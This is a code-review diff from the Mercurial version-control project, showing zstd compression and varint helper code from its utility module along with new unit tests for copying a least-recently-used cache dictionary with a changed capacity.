3662 3675 # zstd level 3 is almost always significantly faster than zlib
3663 3676 # while providing no worse compression. It strikes a good balance
3664 3677 # between speed and compression.
3665 3678 level = opts.get('level', 3)
3666 3679
3667 3680 zstd = self._module
3668 3681 z = zstd.ZstdCompressor(level=level).compressobj()
3669 3682 for chunk in it:
3670 3683 data = z.compress(chunk)
3671 3684 if data:
3672 3685 yield data
3673 3686
3674 3687 yield z.flush()
3675 3688
3676 3689 def decompressorreader(self, fh):
3677 3690 return _ZstdCompressedStreamReader(fh, self._module)
3678 3691
3679 3692 class zstdrevlogcompressor(object):
3680 3693 def __init__(self, zstd, level=3):
3681 3694 # TODO consider omitting frame magic to save 4 bytes.
3682 3695 # This writes content sizes into the frame header. That is
3683 3696 # extra storage. But it allows a correct size memory allocation
3684 3697 # to hold the result.
3685 3698 self._cctx = zstd.ZstdCompressor(level=level)
3686 3699 self._dctx = zstd.ZstdDecompressor()
3687 3700 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3688 3701 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3689 3702
3690 3703 def compress(self, data):
3691 3704 insize = len(data)
3692 3705 # Caller handles empty input case.
3693 3706 assert insize > 0
3694 3707
3695 3708 if insize < 50:
3696 3709 return None
3697 3710
3698 3711 elif insize <= 1000000:
3699 3712 compressed = self._cctx.compress(data)
3700 3713 if len(compressed) < insize:
3701 3714 return compressed
3702 3715 return None
3703 3716 else:
3704 3717 z = self._cctx.compressobj()
3705 3718 chunks = []
3706 3719 pos = 0
3707 3720 while pos < insize:
3708 3721 pos2 = pos + self._compinsize
3709 3722 chunk = z.compress(data[pos:pos2])
3710 3723 if chunk:
3711 3724 chunks.append(chunk)
3712 3725 pos = pos2
3713 3726 chunks.append(z.flush())
3714 3727
3715 3728 if sum(map(len, chunks)) < insize:
3716 3729 return ''.join(chunks)
3717 3730 return None
3718 3731
3719 3732 def decompress(self, data):
3720 3733 insize = len(data)
3721 3734
3722 3735 try:
3723 3736 # This was measured to be faster than other streaming
3724 3737 # decompressors.
3725 3738 dobj = self._dctx.decompressobj()
3726 3739 chunks = []
3727 3740 pos = 0
3728 3741 while pos < insize:
3729 3742 pos2 = pos + self._decompinsize
3730 3743 chunk = dobj.decompress(data[pos:pos2])
3731 3744 if chunk:
3732 3745 chunks.append(chunk)
3733 3746 pos = pos2
3734 3747 # Frame should be exhausted, so no finish() API.
3735 3748
3736 3749 return ''.join(chunks)
3737 3750 except Exception as e:
3738 3751 raise error.RevlogError(_('revlog decompress error: %s') %
3739 3752 stringutil.forcebytestr(e))
3740 3753
3741 3754 def revlogcompressor(self, opts=None):
3742 3755 opts = opts or {}
3743 3756 return self.zstdrevlogcompressor(self._module,
3744 3757 level=opts.get('level', 3))
3745 3758
3746 3759 compengines.register(_zstdengine())
3747 3760
3748 3761 def bundlecompressiontopics():
3749 3762 """Obtains a list of available bundle compressions for use in help."""
3750 3763 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3751 3764 items = {}
3752 3765
3753 3766 # We need to format the docstring. So use a dummy object/type to hold it
3754 3767 # rather than mutating the original.
3755 3768 class docobject(object):
3756 3769 pass
3757 3770
3758 3771 for name in compengines:
3759 3772 engine = compengines[name]
3760 3773
3761 3774 if not engine.available():
3762 3775 continue
3763 3776
3764 3777 bt = engine.bundletype()
3765 3778 if not bt or not bt[0]:
3766 3779 continue
3767 3780
3768 3781 doc = pycompat.sysstr('``%s``\n %s') % (
3769 3782 bt[0], engine.bundletype.__doc__)
3770 3783
3771 3784 value = docobject()
3772 3785 value.__doc__ = doc
3773 3786 value._origdoc = engine.bundletype.__doc__
3774 3787 value._origfunc = engine.bundletype
3775 3788
3776 3789 items[bt[0]] = value
3777 3790
3778 3791 return items
3779 3792
3780 3793 i18nfunctions = bundlecompressiontopics().values()
3781 3794
3782 3795 # convenient shortcut
3783 3796 dst = debugstacktrace
3784 3797
3785 3798 def safename(f, tag, ctx, others=None):
3786 3799 """
3787 3800 Generate a name that it is safe to rename f to in the given context.
3788 3801
3789 3802 f: filename to rename
3790 3803 tag: a string tag that will be included in the new name
3791 3804 ctx: a context, in which the new name must not exist
3792 3805 others: a set of other filenames that the new name must not be in
3793 3806
3794 3807 Returns a file name of the form oldname~tag[~number] which does not exist
3795 3808 in the provided context and is not in the set of other names.
3796 3809 """
3797 3810 if others is None:
3798 3811 others = set()
3799 3812
3800 3813 fn = '%s~%s' % (f, tag)
3801 3814 if fn not in ctx and fn not in others:
3802 3815 return fn
3803 3816 for n in itertools.count(1):
3804 3817 fn = '%s~%s~%s' % (f, tag, n)
3805 3818 if fn not in ctx and fn not in others:
3806 3819 return fn
3807 3820
3808 3821 def readexactly(stream, n):
3809 3822 '''read n bytes from stream.read and abort if less was available'''
3810 3823 s = stream.read(n)
3811 3824 if len(s) < n:
3812 3825 raise error.Abort(_("stream ended unexpectedly"
3813 3826 " (got %d bytes, expected %d)")
3814 3827 % (len(s), n))
3815 3828 return s
3816 3829
3817 3830 def uvarintencode(value):
3818 3831 """Encode an unsigned integer value to a varint.
3819 3832
3820 3833 A varint is a variable length integer of 1 or more bytes. Each byte
3821 3834 except the last has the most significant bit set. The lower 7 bits of
3822 3835 each byte store the 2's complement representation, least significant group
3823 3836 first.
3824 3837
3825 3838 >>> uvarintencode(0)
3826 3839 '\\x00'
3827 3840 >>> uvarintencode(1)
3828 3841 '\\x01'
3829 3842 >>> uvarintencode(127)
3830 3843 '\\x7f'
3831 3844 >>> uvarintencode(1337)
3832 3845 '\\xb9\\n'
3833 3846 >>> uvarintencode(65536)
3834 3847 '\\x80\\x80\\x04'
3835 3848 >>> uvarintencode(-1)
3836 3849 Traceback (most recent call last):
3837 3850 ...
3838 3851 ProgrammingError: negative value for uvarint: -1
3839 3852 """
3840 3853 if value < 0:
3841 3854 raise error.ProgrammingError('negative value for uvarint: %d'
3842 3855 % value)
3843 3856 bits = value & 0x7f
3844 3857 value >>= 7
3845 3858 bytes = []
3846 3859 while value:
3847 3860 bytes.append(pycompat.bytechr(0x80 | bits))
3848 3861 bits = value & 0x7f
3849 3862 value >>= 7
3850 3863 bytes.append(pycompat.bytechr(bits))
3851 3864
3852 3865 return ''.join(bytes)
3853 3866
3854 3867 def uvarintdecodestream(fh):
3855 3868 """Decode an unsigned variable length integer from a stream.
3856 3869
3857 3870 The passed argument is anything that has a ``.read(N)`` method.
3858 3871
3859 3872 >>> try:
3860 3873 ... from StringIO import StringIO as BytesIO
3861 3874 ... except ImportError:
3862 3875 ... from io import BytesIO
3863 3876 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3864 3877 0
3865 3878 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3866 3879 1
3867 3880 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3868 3881 127
3869 3882 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3870 3883 1337
3871 3884 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3872 3885 65536
3873 3886 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3874 3887 Traceback (most recent call last):
3875 3888 ...
3876 3889 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3877 3890 """
3878 3891 result = 0
3879 3892 shift = 0
3880 3893 while True:
3881 3894 byte = ord(readexactly(fh, 1))
3882 3895 result |= ((byte & 0x7f) << shift)
3883 3896 if not (byte & 0x80):
3884 3897 return result
3885 3898 shift += 7
@@ -1,122 +1,176 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d['a'] = 'va'
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d['d'] = 'vd'
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 # 'a' should be dropped because it was least recently used.
26 26 d['e'] = 've'
27 27 self.assertNotIn('a', d)
28 28
29 29 self.assertIsNone(d.get('a'))
30 30
31 31 self.assertEqual(d['b'], 'vb')
32 32 self.assertEqual(d['c'], 'vc')
33 33 self.assertEqual(d['d'], 'vd')
34 34 self.assertEqual(d['e'], 've')
35 35
36 36 # Touch entries in some order (both get and set).
37 37 d['e']
38 38 d['c'] = 'vc2'
39 39 d['d']
40 40 d['b'] = 'vb2'
41 41
42 42 # 'e' should be dropped now
43 43 d['f'] = 'vf'
44 44 self.assertNotIn('e', d)
45 45 self.assertEqual(d['b'], 'vb2')
46 46 self.assertEqual(d['c'], 'vc2')
47 47 self.assertEqual(d['d'], 'vd')
48 48 self.assertEqual(d['f'], 'vf')
49 49
50 50 d.clear()
51 51 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
52 52 self.assertNotIn(key, d)
53 53
54 54 def testunfull(self):
55 55 d = util.lrucachedict(4)
56 56 d['a'] = 1
57 57 d['b'] = 2
58 58 d['a']
59 59 d['b']
60 60
61 61 for key in ('a', 'b'):
62 62 self.assertIn(key, d)
63 63
64 64 def testcopypartial(self):
65 65 d = util.lrucachedict(4)
66 66 d['a'] = 'va'
67 67 d['b'] = 'vb'
68 68
69 69 dc = d.copy()
70 70
71 71 self.assertEqual(len(dc), 2)
72 72 for key in ('a', 'b'):
73 73 self.assertIn(key, dc)
74 74 self.assertEqual(dc[key], 'v%s' % key)
75 75
76 76 self.assertEqual(len(d), 2)
77 77 for key in ('a', 'b'):
78 78 self.assertIn(key, d)
79 79 self.assertEqual(d[key], 'v%s' % key)
80 80
81 81 d['c'] = 'vc'
82 82 del d['b']
83 83 dc = d.copy()
84 84 self.assertEqual(len(dc), 2)
85 85 for key in ('a', 'c'):
86 86 self.assertIn(key, dc)
87 87 self.assertEqual(dc[key], 'v%s' % key)
88 88
89 89 def testcopyempty(self):
90 90 d = util.lrucachedict(4)
91 91 dc = d.copy()
92 92 self.assertEqual(len(dc), 0)
93 93
94 94 def testcopyfull(self):
95 95 d = util.lrucachedict(4)
96 96 d['a'] = 'va'
97 97 d['b'] = 'vb'
98 98 d['c'] = 'vc'
99 99 d['d'] = 'vd'
100 100
101 101 dc = d.copy()
102 102
103 103 for key in ('a', 'b', 'c', 'd'):
104 104 self.assertIn(key, dc)
105 105 self.assertEqual(dc[key], 'v%s' % key)
106 106
107 107 # 'a' should be dropped because it was least recently used.
108 108 dc['e'] = 've'
109 109 self.assertNotIn('a', dc)
110 110 for key in ('b', 'c', 'd', 'e'):
111 111 self.assertIn(key, dc)
112 112 self.assertEqual(dc[key], 'v%s' % key)
113 113
114 114 # Contents and order of original dict should remain unchanged.
115 115 dc['b'] = 'vb_new'
116 116
117 117 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
118 118 for key in ('a', 'b', 'c', 'd'):
119 119 self.assertEqual(d[key], 'v%s' % key)
120 120
121 def testcopydecreasecapacity(self):
122 d = util.lrucachedict(5)
123 d['a'] = 'va'
124 d['b'] = 'vb'
125 d['c'] = 'vc'
126 d['d'] = 'vd'
127
128 dc = d.copy(2)
129 for key in ('a', 'b'):
130 self.assertNotIn(key, dc)
131 for key in ('c', 'd'):
132 self.assertIn(key, dc)
133 self.assertEqual(dc[key], 'v%s' % key)
134
135 dc['e'] = 've'
136 self.assertNotIn('c', dc)
137 for key in ('d', 'e'):
138 self.assertIn(key, dc)
139 self.assertEqual(dc[key], 'v%s' % key)
140
141 # Original should remain unchanged.
142 for key in ('a', 'b', 'c', 'd'):
143 self.assertIn(key, d)
144 self.assertEqual(d[key], 'v%s' % key)
145
146 def testcopyincreasecapacity(self):
147 d = util.lrucachedict(5)
148 d['a'] = 'va'
149 d['b'] = 'vb'
150 d['c'] = 'vc'
151 d['d'] = 'vd'
152
153 dc = d.copy(6)
154 for key in ('a', 'b', 'c', 'd'):
155 self.assertIn(key, dc)
156 self.assertEqual(dc[key], 'v%s' % key)
157
158 dc['e'] = 've'
159 dc['f'] = 'vf'
160 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
161 self.assertIn(key, dc)
162 self.assertEqual(dc[key], 'v%s' % key)
163
164 dc['g'] = 'vg'
165 self.assertNotIn('a', dc)
166 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
167 self.assertIn(key, dc)
168 self.assertEqual(dc[key], 'v%s' % key)
169
170 # Original should remain unchanged.
171 for key in ('a', 'b', 'c', 'd'):
172 self.assertIn(key, d)
173 self.assertEqual(d[key], 'v%s' % key)
174
121 175 if __name__ == '__main__':
122 176 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now